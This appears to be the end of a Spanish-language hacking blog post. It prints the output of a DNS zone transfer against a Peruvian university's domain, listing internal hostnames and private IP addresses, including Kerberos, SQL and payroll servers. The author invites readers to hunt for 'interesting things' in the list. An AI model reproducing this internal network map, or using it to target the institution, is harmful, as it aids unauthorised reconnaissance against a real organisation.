_kerberos._udp.sisbib SRV priority=0, weight=100, port=88, sbpri.sisbib.unmsm.edu.pe
_kpasswd._udp.sisbib SRV priority=0, weight=100, port=464, sbpri.sisbib.unmsm.edu.pe
sbweb.sisbib A 172.16.160.4
sisbib-02 A 172.16.160.14
sisbib-03 A 172.16.160.15
sistemas A 172.16.64.4
www.moodle.sistemas A 172.16.66.10
www.pgis.sistemas A 172.16.65.10
www.sistemas A 172.16.64.4
sistemas2 A 172.16.67.44
www.sistemas2 A 172.16.67.44
sociales A 172.16.52.4
virtual.sociales A 172.16.52.5
software A 172.16.156.14
sql1 A 172.16.160.7
sueldosserver A 172.16.159.13
sum A 172.16.156.51
urubamba A 172.16.156.10
veterinaria A 172.16.156.14
viceacademico A 172.16.88.37
vicus A 172.16.156.17
vracademico A 172.16.88.31
vrinvestigacion A 172.16.91.118
webserve A 172.16.156.75
www A 172.16.156.14
www1 A 172.16.156.75
yungay A 172.16.156.4
unmsm.edu.pe. SOA celendin.unmsm.edu.pe admin.unmsm.edu.pe. (200344142 108000 900 864000 3600)


Bueno ahí les dejo el resultado de la transferencia de zona. Examínenlo con cuidado y tal vez encuentren cosas interesantes. Aclaro que lo que están ahí son las IPs locales de los servidores de la universidad.

Por ultimo decirles que hace unos dias quise hacer un video de esto pero las maquinas de la videoteca ya no estaban conectadas a la red de la universidad ¿Se habrán dado cuenta del error o simplemente nos quedamos sin salida a internet otra vez? No importa la idea es que no pude hacer el video y tal vez lo que he explicado ya no funcione.

Espero que les haya gustado y naa...
Saludos, hasta la próxima.

Todo lo explicado aquí es solo con fines didácticos. El autor no se hace responsable del uso que se le pueda dar a esta información.